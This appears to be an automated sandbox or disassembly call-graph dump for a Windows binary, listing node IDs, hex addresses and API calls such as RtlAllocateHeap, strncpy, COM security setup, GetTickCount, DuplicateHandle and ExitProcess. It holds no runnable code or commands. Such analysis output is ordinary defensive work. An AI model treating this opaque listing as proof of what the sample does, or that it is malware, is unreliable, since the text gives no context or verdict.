13906->14138 13908 49e7b6a 13920 49e13a0 13908->13920 14149 49e7611 13908->14149 13910 49e7b9b 13912 49e8bf4 2 API calls 13910->13912 13911 49e7b94 13911->13910 14166 49e75ab 13911->14166 13913 49e7bd6 13912->13913 13914 49e8bf4 2 API calls 13913->13914 13916 49e7be1 13914->13916 13919 49e8bf4 2 API calls 13916->13919 13919->13920 13920->13871 13920->13874 13920->13891 14424 49e8bde RtlAllocateHeap 13921->14424 13923 49e6893 13924 49ea96c 4 API calls 13923->13924 14020 49e6d6c 13923->14020 13925 49e68a8 13924->13925 14425 49efbdb 13925->14425 13930 49e98bd RtlAllocateHeap 13931 49e68cc 13930->13931 13932 49e98bd RtlAllocateHeap 13931->13932 13933 49e68e0 13932->13933 13934 49e6905 13933->13934 13935 49e98bd RtlAllocateHeap 13933->13935 13936 49e98bd RtlAllocateHeap 13934->13936 13935->13934 13937 49e692a 13936->13937 14451 49ee7c6 13937->14451 13943 49e6996 13944 49e109a 2 API calls 13943->13944 13945 49e69c3 13944->13945 13946 49e109a 2 API calls 13945->13946 13947 49e69d2 13946->13947 13948 49e109a 2 API calls 13947->13948 13949 49e69e1 13948->13949 13950 49e109a 2 API calls 13949->13950 13951 49e69ee 13950->13951 13952 49e109a 2 API calls 13951->13952 13953 49e69ff 13952->13953 13954 49e109a 2 API calls 13953->13954 13955 49e6a10 13954->13955 13956 49e9e51 2 API calls 13955->13956 13957 49e6a32 13956->13957 13958 49e109a 2 API calls 13957->13958 13959 49e6a3c 13958->13959 13960 49e109a 2 API calls 13959->13960 13961 49e6a4c 13960->13961 13962 49e109a 2 API calls 13961->13962 13963 49e6a5b 13962->13963 13964 49e109a 2 API calls 13963->13964 13965 49e6a6a 13964->13965 13966 49e109a 2 API calls 13965->13966 13967 49e6a79 13966->13967 13968 49e109a 2 API calls 13967->13968 13969 49e6a88 13968->13969 14505 49eb6ae 13969->14505 13972 49eb6ae 5 API calls 13973 49e6aa5 13972->13973 13974 49eb6ae 5 API calls 13973->13974 13975 49e6ab5 13974->13975 13976 49eb6ae 5 API calls 13975->13976 13977 49e6ac5 13976->13977 13978 49eb6ae 5 API calls 13977->13978 13979 49e6ad2 13978->13979 13980 49e6af1 13979->13980 13981 49eb6ae 5 API calls 13979->13981 13982 49eb6ae 5 API calls 13980->13982 13981->13980 13983 49e6aff 13982->13983 13984 49eb6ae 5 API calls 13983->13984 13985 49e6b0d 13984->13985 13986 49eb6ae 5 API calls 13985->13986 13987 49e6b1b 13986->13987 13988 49eb6ae 5 API calls 13987->13988 13989 49e6b29 13988->13989 13990 49eb6ae 5 API calls 13989->13990 13991 49e6b37 13990->13991 13992 49eb6ae 5 API calls 13991->13992 13993 49e6b45 13992->13993 13994 49e8baf 2 API calls 13993->13994 14020->13891 14069 49e9df2 2 API calls 14068->14069 14070 49eb188 14069->14070 14071 49e8baf 2 API calls 14070->14071 14072 49e13f9 14071->14072 14073 49eb266 14072->14073 14074 49ea91d 4 API calls 14073->14074 14075 49eb278 14074->14075 14076 49ea065 GetSystemTimeAsFileTime 14075->14076 14077 49e1405 14076->14077 14078 49e7bf5 14077->14078 14614 49f03bd 14078->14614 14080 49e7c15 14617 49e802c 14080->14617 14782 49e970f 14095->14782 14098 49f03bd GetTickCount 14099 49e7a07 14098->14099 14788 49e7df8 14099->14788 14101 49e148c 14101->13882 14101->13883 14102 49e7a27 14102->14101 14103 49e7611 19 API calls 14102->14103 14104 49e7a57 14103->14104 14108 49e75ab 8 API calls 14104->14108 14119 49e7a5e 14104->14119 14105 49e8bf4 2 API calls 14106 49e7b2d 14105->14106 14107 49e8bf4 2 API calls 14106->14107 14109 49e7b38 14107->14109 14110 49e7a88 14108->14110 14111 49e8bf4 2 API calls 14109->14111 14110->14119 14827 49e7858 14110->14827 14111->14101 14113 49e7ab6 14113->14119 14840 49e7728 14113->14840 14117 49e7b02 14862 49e76d7 14117->14862 14119->14105 14121 49e1133 14120->14121 14122 49e9edb memset 14121->14122 14129 49e1187 14121->14129 14123 49e1159 14122->14123 14124 49ea065 GetSystemTimeAsFileTime 14123->14124 14125 49e116e 14124->14125 14126 49eaa91 6 API calls 14125->14126 14127 49e117c 14126->14127 14128 49eaa65 6 API calls 14127->14128 14128->14129 14129->13888 14131 49e1104 14130->14131 14132 49e10f2 14130->14132 14134 49ea96c 4 API calls 14131->14134 14133 49ea96c 4 API calls 14132->14133 14135 49e10f9 14133->14135 14134->14135 14906 49e10c5 14135->14906 14137 49e111b 14137->13871 14178 49f1152 14138->14178 14140 49e7da4 14182 49e8753 14140->14182 14142 49e7db7 14143 49e8753 strncpy 14142->14143 14144 49e7dcb 14143->14144 14145 49e8753 strncpy 14144->14145 14146 49e7ddf 14145->14146 14186 49f1bd3 14146->14186 14148 49e7de7 14148->13908 14274 49e74fa 14149->14274 14153 49e764b 14164 49e7680 14153->14164 14288 49e7417 14153->14288 14155 49e8bf4 2 API calls 14156 49e7698 14155->14156 14157 49e8bf4 2 API calls 14156->14157 14158 49e76a3 14157->14158 14160 49e8bf4 2 API calls 14158->14160 14159 49e7659 14159->14164 14296 49efab4 14159->14296 14162 49e76ae 14160->14162 14163 49e8bf4 2 API calls 14162->14163 14165 49e76b8 14162->14165 14163->14165 14164->14155 14165->13911 14167 49ec307 2 API calls 14166->14167 14168 49e75c3 14167->14168 14169 49e75ff 14168->14169 14170 49e7473 5 API calls 14168->14170 14175 49e77de 14169->14175 14171 49e75e2 14170->14171 14172 49f0320 lstrlenW 14171->14172 14173 49e75f6 14172->14173 14174 49e8ce0 lstrlenA 14173->14174 14174->14169 14365 49f1cc0 14175->14365 14177 49e77f7 14177->13910 14179 49f115a 14178->14179 14180 49f1161 14179->14180 14191 49f288e 14179->14191 14180->14140 14183 49e8764 14182->14183 14184 49e8769 14182->14184 14183->14142 14209 49f1232 14184->14209 14187 49f1be2 14186->14187 14188 49f1be7 14187->14188 14221 49f1b77 14187->14221 14188->14148 14190 49f1c00 14190->14148 14192 49f289d 14191->14192 14193 49f28d0 14191->14193 14194 49f28ae 14192->14194 14195 49f28c1 SwitchToThread 14192->14195 14193->14180 14196 49f28b7 14194->14196 14198 49f2868 14194->14198 14195->14193 14195->14195 14196->14180 14203 49f28f0 GetModuleHandleW 14198->14203 14200 49f2875 14202 49f2883 14200->14202 14208 49f28d2 _time64 GetCurrentProcessId 14200->14208 14202->14196 14204 49f290e GetProcAddress 14203->14204 14207 49f293f 14203->14207 14205 49f2922 GetProcAddress 14204->14205 14204->14207 14206 49f2931 GetProcAddress 14205->14206 14205->14207 14206->14207 14207->14200 14208->14202 14210 49f123d 14209->14210 14211 49f1264 14209->14211 14210->14211 14213 49f1278 14210->14213 14211->14183 14214 49f12a6 14213->14214 14215 49f1283 14213->14215 14214->14211 14215->14214 14217 49f2e7a 14215->14217 14219 49f2e92 14217->14219 14218 49f2ee5 14218->14214 14219->14218 14220 49f2f19 strncpy 14219->14220 14220->14218 14222 49f1b8a 14221->14222 14224 49f1ba6 14222->14224 14225 49f1464 14222->14225 14224->14190 14226 49f1492 14225->14226 14230 49f14a4 14225->14230 14227 49f154f 14226->14227 14228 49f14ce 14226->14228 14229 49f14fe 14226->14229 14226->14230 14231 49f1662 14226->14231 14236 49f152e 14226->14236 14266 49f1c2d _snprintf 14227->14266 14233 49f14d4 _snprintf 14228->14233 14249 49f3379 14229->14249 14230->14224 14234 49f1c2d 2 API calls 14231->14234 14233->14230 14238 49f1691 14234->14238 14261 49f19a9 14236->14261 14238->14230 14240 49f1849 14238->14240 14241 49f1713 14238->14241 14239 49f155e 14239->14230 14242 49f1464 11 API calls 14239->14242 14240->14230 14243 49f19a9 2 API calls 14240->14243 14245 49f1464 11 API calls 14240->14245 14241->14230 14244 49f1754 qsort 14241->14244 14242->14239 14243->14240 14244->14230 14248 49f177d 14244->14248 14245->14240 14246 49f19a9 2 API calls 14246->14248 14247 49f1464 11 API calls 14247->14248 14248->14230 14248->14246 14248->14247 14250 49f3386 _snprintf 14249->14250 14251 49f3383 14249->14251 14252 49f33af 14250->14252 14253 49f3426 14250->14253 14251->14250 14252->14253 14271 49f3352 localeconv 14252->14271 14253->14230 14256 49f33ed strchr 14256->14253 14259 49f3400 14256->14259 14257 49f33c9 strchr 14257->14256 14258 49f33d7 14257->14258 14258->14253 14258->14256 14259->14253 14260 49e8ce0 lstrlenA 14259->14260 14260->14253 14263 49f19bf 14261->14263 14262 49f1b47 14262->14230 14263->14262 14264 49f1ad9 _snprintf 14263->14264 14265 49f1ac2 _snprintf 14263->14265 14264->14263 14265->14263 14267 49f1c4e 14266->14267 14268 49f1c55 14267->14268 14269 49f2e7a strncpy 14267->14269 14268->14239 14270 49f1c6b 14269->14270 14270->14239 14272 49f3374 strchr 14271->14272 14273 49f3362 strchr 14271->14273 14272->14256 14272->14257 14273->14272 14300 49e8bde RtlAllocateHeap 14274->14300 14276 49e7514 14277 49e7595 14276->14277 14278 49f351a 2 API calls 14276->14278 14277->14165 14285 49ec295 14277->14285 14279 49e7538 14278->14279 14301 49e7473 14279->14301 14281 49e754d 14282 49f0320 lstrlenW 14281->14282 14283 49e7580 14282->14283 14284 49e8d6d memset 14283->14284 14284->14277 14310 49e8bde RtlAllocateHeap 14285->14310 14287 49ec2ba 14287->14153 14289 49e7428 14288->14289 14290 49e96da 2 API calls 14289->14290 14291 49e7444 14290->14291 14311 49e8bde RtlAllocateHeap 14291->14311 14293 49e744f 14294 49e7469 14293->14294 14295 49e9e12 2 API calls 14293->14295 14294->14159 14295->14294 14299 49efac8 14296->14299 14298 49efb0e 14298->14164 14299->14298 14312 49efb15 14299->14312 14300->14276 14302 49e748c 14301->14302 14303 49e1080 2 API calls 14302->14303 14304 49e7499 lstrcpynA 14303->14304 14305 49e74b7 14304->14305 14306 49e8b9c 2 API calls 14305->14306 14307 49e74c1 14306->14307 14308 49e8d6d memset 14307->14308 14309 49e74e6 14308->14309 14309->14281 14310->14287 14311->14293 14317 49ef7a6 memset memset 14312->14317 14314 49efb64 14314->14299 14315 49efb41 14315->14314 14343 49ef5a4 14315->14343 14318 49e9dd8 2 API calls 14317->14318 14319 49ef7fa 14318->14319 14320 49e9dd8 2 API calls 14319->14320 14321 49ef807 14320->14321 14322 49e9dd8 2 API calls 14321->14322 14323 49ef814 14322->14323 14324 49e9dd8 2 API calls 14323->14324 14325 49ef821 14324->14325 14326 49e9dd8 2 API calls 14325->14326 14327 49ef82e 14326->14327 14328 49e8d6d memset 14327->14328 14337 49ef842 14328->14337 14329 49ef8bf GetLastError 14329->14337 14330 49efa12 14331 49e8d6d memset 14330->14331 14336 49ef88c 14330->14336 14332 49efa34 14331->14332 14335 49efa50 GetLastError 14332->14335 14332->14336 14333 49ef900 GetLastError 14333->14337 14334 49ea065 GetSystemTimeAsFileTime 14334->14337 14335->14336 14336->14315 14337->14329 14337->14330 14337->14333 14337->14334 14337->14336 14338 49ef958 GetLastError 14337->14338 14340 49e9dd8 2 API calls 14337->14340 14341 49e8b9c 2 API calls 14337->14341 14342 49ef9d2 GetLastError 14337->14342 14359 49ef6ec 14337->14359 14338->14337 14340->14337 14341->14337 14342->14337 14344 49ef5c1 14343->14344 14363 49e8bde RtlAllocateHeap 14344->14363 14346 49ef5d6 14358 49ef5df 14346->14358 14364 49e8bde RtlAllocateHeap 14346->14364 14348 49ef6ca 14348->14314 14349 49ef6b2 14349->14348 14351 49e8bf4 2 API calls 14349->14351 14350 49e8bf4 2 API calls 14350->14349 14351->14348 14352 49ef5ef 14352->14349 14353 49ef68c GetLastError 14352->14353 14355 49ea065 GetSystemTimeAsFileTime 14352->14355 14357 49e8c72 3 API calls 14352->14357 14352->14358 14354 49ef698 14353->14354 14353->14358 14356 49ea065 GetSystemTimeAsFileTime 14354->14356 14355->14352 14356->14358 14357->14352 14358->14349 14358->14350 14360 49ef70e 14359->14360 14361 49ef733 GetLastError 14360->14361 14362 49ef72e 14360->14362 14361->14362 14362->14337 14363->14346 14364->14352 14366 49f1d13 14365->14366 14367 49f1ccd 14365->14367 14366->14177 14367->14366 14370 49f240b 14367->14370 14369 49f1d00 14369->14177 14377 49f1e0e 14370->14377 14372 49f2422 14376 49f2449 14372->14376 14381 49f257f 14372->14381 14374 49f2440 14375 49f1e0e 8 API calls 14374->14375 14374->14376 14375->14376 14376->14369 14378 49f1e20 14377->14378 14380 49f1e59 14378->14380 14391 49f1fad 14378->14391 14380->14372 14382 49f2596 14381->14382 14389 49f25e0 14381->14389 14383 49f2606 14382->14383 14384 49f25b2 14382->14384 14382->14389 14417 49f238b 14383->14417 14385 49f25b7 14384->14385 14386 49f25f5 14384->14386 14385->14389 14390 49f25c8 memchr 14385->14390 14407 49f247c 14386->14407 14389->14374 14390->14389 14392 49f1fc7 14391->14392 14393 49f1fec 14392->14393 14394 49f2081 14392->14394 14395 49f2036 14392->14395 14393->14380 14394->14393 14398 49f3439 14394->14398 14397 49f2046 _errno _strtoi64 _errno 14395->14397 14397->14393 14404 49f349d localeconv 14398->14404 14401 49f3471 14402 49f3480 _errno 14401->14402 14403 49f348c 14401->14403 14402->14403 14403->14393 14405 49f34ad strchr 14404->14405 14406 49f3448 _errno strtod 14404->14406 14405->14406 14406->14401 14406->14402 14408 49f1152 7 API calls 14407->14408 14409 49f2488 14408->14409 14410 49f24aa 14409->14410 14411 49f1e0e 8 API calls 14409->14411 14410->14389 14416 49f249e 14411->14416 14412 49f24c7 memchr 14412->14410 14412->14416 14413 49f1e0e 8 API calls 14413->14416 14414 49f257f 17 API calls 14414->14416 14415 49f1278 strncpy 14415->14416 14416->14410 14416->14412 14416->14413 14416->14414 14416->14415 14418 49f2394 14417->14418 14419 49f1e0e 8 API calls 14418->14419 14420 49f23af 14418->14420 14422 49f23a7 14419->14422 14420->14389 14421 49f257f 18 API calls 14421->14422 14422->14420 14422->14421 14423 49f1e0e 8 API calls 14422->14423 14423->14422 14424->13923 14426 49e9e12 2 API calls 14425->14426 14427 49e68b3 14426->14427 14428 49ee712 14427->14428 14429 49e9df2 2 API calls 14428->14429 14430 49ee727 14429->14430 14579 49ee400 CoInitializeEx CoInitializeSecurity CoCreateInstance 14430->14579 14433 49e8baf 2 API calls 14434 49ee73f 14433->14434 14435 49e9df2 2 API calls 14434->14435 14450 49e68b8 14434->14450 14436 49ee753 14435->14436 14437 49e9df2 2 API calls 14436->14437 14438 49ee764 14437->14438 14586 49ee656 SysAllocString SysAllocString 14438->14586 14440 49ee775 14441 49ee7a3 14440->14441 14443 49e98bd RtlAllocateHeap 14440->14443 14442 49e8baf 2 API calls 14441->14442 14444 49ee7ac 14442->14444 14445 49ee784 VariantClear 14443->14445 14446 49e8baf 2 API calls 14444->14446 14445->14441 14448 49ee7b5 14446->14448 14592 49ee4b4 14448->14592 14450->13930 14452 49e9df2 2 API calls 14451->14452 14453 49ee7db 14452->14453 14454 49ee400 6 API calls 14453->14454 14455 49ee7e5 14454->14455 14456 49e8baf 2 API calls 14455->14456 14457 49ee7f3 14456->14457 14458 49e9df2 2 API calls 14457->14458 14473 49e696c 14457->14473 14459 49ee807 14458->14459 14460 49e9df2 2 API calls 14459->14460 14461 49ee818 14460->14461 14462 49ee656 10 API calls 14461->14462 14463 49ee829 14462->14463 14464 49ee857 14463->14464 14465 49e98bd RtlAllocateHeap 14463->14465 14466 49e8baf 2 API calls 14464->14466 14468 49ee838 VariantClear 14465->14468 14467 49ee860 14466->14467 14469 49e8baf 2 API calls 14467->14469 14468->14464 14471 49ee869 14469->14471 14472 49ee4b4 2 API calls 14471->14472 14472->14473 14474 49ee87a 14473->14474 14475 49e9df2 2 API calls 14474->14475 14476 49ee88f 14475->14476 14477 49ee400 6 API calls 14476->14477 14478 49ee899 14477->14478 14479 49e8baf 2 API calls 14478->14479 14480 49ee8a7 14479->14480 14481 49e9df2 2 API calls 14480->14481 14496 49e6974 14480->14496 14482 49ee8bb 14481->14482 14483 49e9df2 2 API calls 14482->14483 14484 49ee8cc 14483->14484 14485 49ee656 10 API calls 14484->14485 14486 49ee8dd 14485->14486 14487 49ee90b 14486->14487 14488 49e98bd RtlAllocateHeap 14486->14488 14489 49e8baf 2 API calls 14487->14489 14490 49ee8ec VariantClear 14488->14490 14491 49ee914 14489->14491 14490->14487 14493 49e8baf 2 API calls 14491->14493 14494 49ee91d 14493->14494 14495 49ee4b4 2 API calls 14494->14495 14495->14496 14497 49e6f6c 14496->14497 14597 49e8bde RtlAllocateHeap 14497->14597 14499 49e6f74 14500 49e6f9d 14499->14500 14598 49e8bde RtlAllocateHeap 14499->14598 14500->13943 14502 49e6f85 14502->14500 14599 49eba09 14502->14599 14506 49e8d6d memset 14505->14506 14507 49eb6f2 14506->14507 14508 49e8d6d memset 14507->14508 14509 49eb6fe 14508->14509 14512 49e6a94 14509->14512 14518 49eb856 14509->14518 14603 49e8bde RtlAllocateHeap 14509->14603 14510 49e8bf4 2 API calls 14510->14512 14512->13972 14513 49eb76d 14513->14512 14514 49e9a07 2 API calls 14513->14514 14515 49e9880 RtlAllocateHeap 14513->14515 14516 49e8bf4 2 API calls 14513->14516 14517 49eb81c 14513->14517 14513->14518 14514->14513 14515->14513 14516->14513 14517->14518 14519 49e9930 2 API calls 14517->14519 14518->14510 14520 49eb83f 14519->14520 14520->14518 14521 49eb845 14520->14521 14522 49e8bf4 2 API calls 14521->14522 14522->14512 14580 49ee482 14579->14580 14581 49ee445 SysAllocString 14579->14581 14580->14433 14582 49ee460 14581->14582 14582->14580 14583 49ee464 CoSetProxyBlanket 14582->14583 14583->14580 14584 49ee47b 14583->14584 14596 49e8bde RtlAllocateHeap 14584->14596 14587 49e9df2 2 API calls 14586->14587 14588 49ee681 SysAllocString 14587->14588 14589 49e8baf 2 API calls 14588->14589 14591 49ee694 SysFreeString SysFreeString SysFreeString 14589->14591 14591->14440 14593 49ee4bf 14592->14593 14594 49e8bf4 2 API calls 14593->14594 14595 49ee4dc 14594->14595 14595->14450 14596->14580 14597->14499 14598->14502 14600 49eba25 14599->14600 14601 49e8d6d memset 14600->14601 14602 49e6f99 14600->14602 14601->14602 14602->13943 14603->14513 14615 49f03dd GetTickCount 14614->14615 14616 49f03cc __aulldiv 14614->14616 14615->14080 14616->14080 14618 49f1152 7 API calls 14617->14618 14619 49e803c 14618->14619 14620 49e8753 strncpy 14619->14620 14621 49e8055 14620->14621 14622 49e8753 strncpy 14621->14622 14623 49e8069 14622->14623 14624 49e8753 strncpy 14623->14624 14625 49e807a 14624->14625 14626 49e8753 strncpy 14625->14626 14627 49e808b 14626->14627 14628 49e8753 strncpy 14627->14628 14629 49e80a1 14628->14629 14630 49e8753 strncpy 14629->14630 14631 49e80b5 14630->14631 14632 49e8753 strncpy 14631->14632 14633 49e80ce 14632->14633 14634 49e8753 strncpy 14633->14634 14635 49e80e2 14634->14635 14636 49e8753 strncpy 14635->14636 14637 49e80f6 14636->14637 14638 49e8753 strncpy 14637->14638 14639 49e810a 14638->14639 14640 49e8753 strncpy 14639->14640 14641 49e8120 14640->14641 14642 49e8753 strncpy 14641->14642 14643 49e8137 14642->14643 14767 49e87af 14643->14767 14646 49e8753 strncpy 14647 49e814a 14646->14647 14648 49e8753 strncpy 14647->14648 14649 49e815e 14648->14649 14650 49e8753 strncpy 14649->14650 14651 49e8172 14650->14651 14652 49e87af 5 API calls 14651->14652 14653 49e817a 14652->14653 14654 49e8753 strncpy 14653->14654 14655 49e8185 14654->14655 14656 49e87af 5 API calls 14655->14656 14657 49e818d 14656->14657 14658 49e8753 strncpy 14657->14658 14659 49e8198 14658->14659 14660 49e87af 5 API calls 14659->14660 14661 49e81a0 14660->14661 14662 49e8753 strncpy 14661->14662 14663 49e81ab 14662->14663 14664 49e8753 strncpy 14663->14664 14665 49e81bf 14664->14665 14666 49e87af 5 API calls 14665->14666 14667 49e81c7 14666->14667 14668 49e8753 strncpy 14667->14668 14669 49e81d2 14668->14669 14670 49e8753 strncpy 14669->14670 14671 49e81ec 14670->14671 14672 49e87af 5 API calls 14671->14672 14673 49e81f4 14672->14673 14674 49e8753 strncpy 14673->14674 14675 49e81ff 14674->14675 14676 49e8753 strncpy 14675->14676 14677 49e8213 14676->14677 14678 49e8753 strncpy 14677->14678 14679 49e8227 14678->14679 14680 49e87af 5 API calls 14679->14680 14681 49e823b 14680->14681 14682 49e8753 strncpy 14681->14682 14683 49e8246 14682->14683 14684 49e8753 strncpy 14683->14684 14685 49e825a 14684->14685 14686 49e8753 strncpy 14685->14686 14687 49e826e 14686->14687 14688 49e87af 5 API calls 14687->14688 14689 49e8279 14688->14689 14690 49e8753 strncpy 14689->14690 14691 49e8284 14690->14691 14692 49e87af 5 API calls 14691->14692 14693 49e828f 14692->14693 14694 49e8753 strncpy 14693->14694 14695 49e829a 14694->14695 14696 49e87af 5 API calls 14695->14696 14697 49e82a5 14696->14697 14698 49e8753 strncpy 14697->14698 14772 49e996c 14767->14772 14769 49e813f 14769->14646 14770 49e87c2 14770->14769 14771 49e8bf4 2 API calls 14770->14771 14771->14769 14773 49e997b WideCharToMultiByte 14772->14773 14775 49e99cb 14772->14775 14774 49e9996 14773->14774 14773->14775 14781 49e8bde RtlAllocateHeap 14774->14781 14775->14770 14777 49e999f 14777->14775 14778 49e99a7 WideCharToMultiByte 14777->14778 14778->14775 14779 49e99c0 14778->14779 14780 49e8bf4 2 API calls 14779->14780 14780->14775 14781->14777 14783 49e971d 14782->14783 14784 49f3674 2 API calls 14783->14784 14786 49e9767 14784->14786 14785 49e7a02 14785->14098 14786->14785 14787 49f3674 2 API calls 14786->14787 14787->14786 14789 49f1152 7 API calls 14788->14789 14790 49e7e07 14789->14790 14791 49e8753 strncpy 14790->14791 14792 49e7e1d 14791->14792 14793 49e8753 strncpy 14792->14793 14794 49e7e32 14793->14794 14795 49e8753 strncpy 14794->14795 14796 49e7e46 14795->14796 14797 49e8753 strncpy 14796->14797 14798 49e7e5b 14797->14798 14799 49e8753 strncpy 14798->14799 14800 49e7e6c 14799->14800 14801 49e8753 strncpy 14800->14801 14802 49e7e85 14801->14802 14803 49e8753 strncpy 14802->14803 14804 49e7e9b 14803->14804 14805 49e8753 strncpy 14804->14805 14806 49e7eac 14805->14806 14807 49e8753 strncpy 14806->14807 14808 49e7ec0 14807->14808 14809 49e8753 strncpy 14808->14809 14810 49e7ed3 14809->14810 14811 49e8753 strncpy 14810->14811 14812 49e7ee7 14811->14812 14813 49e8753 strncpy 14812->14813 14814 49e7f06 14813->14814 14815 49e87af 5 API calls 14814->14815 14816 49e7f17 14815->14816 14817 49e8753 strncpy 14816->14817 14818 49e7f22 14817->14818 14819 49e87af 5 API calls 14818->14819 14820 49e7f33 14819->14820 14821 49e8753 strncpy 14820->14821 14822 49e7f3e 14821->14822 14823 49e8753 strncpy 14822->14823 14824 49e7f5a 14823->14824 14825 49f1bd3 13 API calls 14824->14825 14826 49e7f62 14825->14826 14826->14102 14828 49f1cc0 18 API calls 14827->14828 14830 49e7876 14828->14830 14829 49e7882 14829->14113 14830->14829 14831 49e9edb memset 14830->14831 14832 49e78b6 14831->14832 14832->14829 14869 49e8bde RtlAllocateHeap 14832->14869 14834 49e793a 14834->14829 14836 49e798e 14834->14836 14837 49e9880 RtlAllocateHeap 14834->14837 14835 49e8bf4 2 API calls 14835->14836 14836->14835 14838 49e799f 14836->14838 14837->14834 14839 49e8bf4 2 API calls 14838->14839 14839->14829 14841 49e773f 14840->14841 14842 49ec307 2 API calls 14841->14842 14843 49e77cf 14841->14843 14844 49e775b 14842->14844 14843->14119 14854 49e1190 14843->14854 14844->14843 14845 49e77a7 14844->14845 14870 49e8bde RtlAllocateHeap 14844->14870 14847 49e8bf4 2 API calls 14845->14847 14849 49e77c5 14847->14849 14848 49e7778 14848->14845 14851 49e9e12 2 API calls 14848->14851 14850 49e8bf4 2 API calls 14849->14850 14850->14843 14852 49e7797 14851->14852 14871 49e89dd 14852->14871 14855 49e111d 8 API calls 14854->14855 14856 49e11a1 14855->14856 14857 49e11ae 14856->14857 14858 49e8d6d memset 14856->14858 14857->14117 14859 49e11c4 14858->14859 14860 49e1dd3 6 API calls 14859->14860 14861 49e11d4 14860->14861 14861->14117 14887 49e7f75 14862->14887 14864 49e76f4 14865 49e7611 19 API calls 14864->14865 14866 49e7714 14865->14866 14867 49e8bf4 2 API calls 14866->14867 14868 49e771f 14867->14868 14868->14119 14869->14834 14870->14848 14874 49e8871 14871->14874 14881 49e87e5 14874->14881 14876 49e8897 14877 49e88ca GetLastError 14876->14877 14878 49e8959 14876->14878 14880 49e889e 14876->14880 14877->14878 14879 49e8bf4 2 API calls 14878->14879 14879->14880 14880->14845 14886 49e8bde RtlAllocateHeap 14881->14886 14883 49e883d lstrlenA 14885 49e884e 14883->14885 14884 49e87f6 14884->14883 14884->14884 14884->14885 14885->14876 14885->14885 14886->14884 14888 49f1152 7 API calls 14887->14888 14889 49e7f84 14888->14889 14890 49e8753 strncpy 14889->14890 14891 49e7f9a 14890->14891 14892 49e8753 strncpy 14891->14892 14893 49e7fae 14892->14893 14894 49e8753 strncpy 14893->14894 14895 49e7fbf 14894->14895 14896 49e8753 strncpy 14895->14896 14897 49e7fd0 14896->14897 14898 49e8753 strncpy 14897->14898 14899 49e7fe5 14898->14899 14900 49e8753 strncpy 14899->14900 14901 49e7ffb 14900->14901 14902 49e8753 strncpy 14901->14902 14903 49e8011 14902->14903 14904 49f1bd3 13 API calls 14903->14904 14905 49e8019 14904->14905 14905->14864 14907 49e9e12 2 API calls 14906->14907 14908 49e10df 14907->14908 14908->14137 14917 49f083c 14920 49e8bde RtlAllocateHeap 14917->14920 14919 49f084c 14920->14919 13347 49e59b1 13348 49e9d18 4 API calls 13347->13348 13349 49e59c9 13348->13349 13350 49e5ab2 13349->13350 13366 49e8bde RtlAllocateHeap 13349->13366 13352 49e59e0 13352->13350 13353 49e9dd8 2 API calls 13352->13353 13354 49e59f8 13353->13354 13355 49e9e12 2 API calls 13354->13355 13356 49e5a0d 13355->13356 13357 49e8b9c 2 API calls 13356->13357 13358 49e5a15 13357->13358 13359 49e8bf4 2 API calls 13358->13359 13360 49e5a30 13359->13360 13361 49eb5fb 2 API calls 13360->13361 13363 49e5a3e 13361->13363 13362 49ebfdb 11 API calls 13362->13363 13363->13362 13364 49e5aa7 13363->13364 13365 49e8bf4 2 API calls 13364->13365 13365->13350 13366->13352 11226 49e632e 11227 49e633e ExitProcess 11226->11227 13382 49e28a4 13383 49e28ba 13382->13383 13401 49e2959 13382->13401 13385 49ec307 2 API calls 13383->13385 13384 49e9c2c 2 API calls 13386 49e2966 13384->13386 13387 49e28c7 13385->13387 13404 49e9d81 13387->13404 13390 49e9930 2 API calls 13391 49e28d5 13390->13391 13392 49e109a 2 API calls 13391->13392 13391->13401 13393 49e28e8 13392->13393 13394 49e9a5a 2 API calls 13393->13394 13395 49e2900 13394->13395 13396 49e8baf 2 API calls 13395->13396 13397 49e290e 13396->13397 13398 49e294c 13397->13398 13399 49eb5fb 2 API calls 13397->13399 13400 49e8bf4 2 API calls 13398->13400 13402 49e292c 13399->13402 13400->13401 13401->13384 13403 49e8bf4 2 API calls 13402->13403 13403->13398 13405 49e28ce 13404->13405 13406 49e9d8a 13404->13406 13405->13390 13408 49e8bde RtlAllocateHeap 13406->13408 13408->13405 13449 49e29a1 13450 49e2a06 13449->13450 13453 49e29b5 13449->13453 13460 49e29f5 13450->13460 13461 49e1b48 13450->13461 13452 49e9c2c 2 API calls 13454 49e2a20 13452->13454 13455 49eaa65 6 API calls 13453->13455 13453->13460 13456 49e29e2 13455->13456 13457 49eaa65 6 API calls 13456->13457 13458 49e29ed 13457->13458 13459 49eaa65 6 API calls 13458->13459 13459->13460 13460->13452 13463 49e1b5d 13461->13463 13462 49e1bc7 13465 49ea065 GetSystemTimeAsFileTime 13462->13465 13463->13462 13464 49ea065 GetSystemTimeAsFileTime 13463->13464 13467 49e1c58 13463->13467 13464->13463 13466 49e1bd1 GetCurrentThread 13465->13466 13469 49e1bf8 DuplicateHandle 13466->13469 13467->13460 13470 49e8d6d memset 13469->13470 13471 49e1c0b 13470->13471 13481 49e2c5b 13471->13481 13475 49e1c3e 13476 49e1c4d 13475->13476 13515 49e6d74 13475->13515 13478 49e8bf4 2 API calls 13476->13478 13478->13467 13479 49e1c2b 13479->13475 13480 49eaa65 6 API calls 13479->13480 13480->13475 13482 49ea9b8 4 API calls 13481->13482 13483 49e2c64 13482->13483 13484 49e1c1b 13483->13484 13485 49e2be4 9 API calls 13483->13485 13490 49e19ec 13484->13490 13488 49e2c79 13485->13488 13486 49e2c94 13486->13484 13487 49e9880 RtlAllocateHeap 13486->13487 13487->13484 13488->13486 13489 49e9880 RtlAllocateHeap 13488->13489 13489->13486 13491 49e1a0c 13490->13491 13492 49e1a50 13490->13492 13493 49ea9b8 4 API calls 13491->13493 13494 49e1ac6 13492->13494 13497 49ea96c 4 API calls 13492->13497 13496 49e1a14 13493->13496 13501 49e1ace 13494->13501 13561 49e171a 13494->13561 13499 49ea96c 4 API calls 13496->13499 13498 49e1a73 13497->13498 13500 49e1aab 13498->13500 13546 49e16e5 13498->13546 13502 49e1a20 13499->13502 13550 49e158a 13500->13550 13501->13479 13504 49e1a3d 13502->13504 13542 49e9edb 13502->13542 13503 49e1b2e 13507 49e8bf4 2 API calls 13503->13507 13505 49e8bf4 2 API calls 13504->13505 13505->13492 13507->13501 13511 49e9edb memset 13513 49e1adf 13511->13513 13512 49e9edb memset 13512->13500 13513->13501 13513->13503 13513->13511 13514 49e158a 7 API calls 13513->13514 13514->13513 13516 49e8bf4 2 API calls 13515->13516 13517 49e6d94 13516->13517 13518 49e8bf4 2 API calls 13517->13518 13519 49e6d9e 13518->13519 13520 49e8bf4 2 API calls 13519->13520 13521 49e6da8 13520->13521 13522 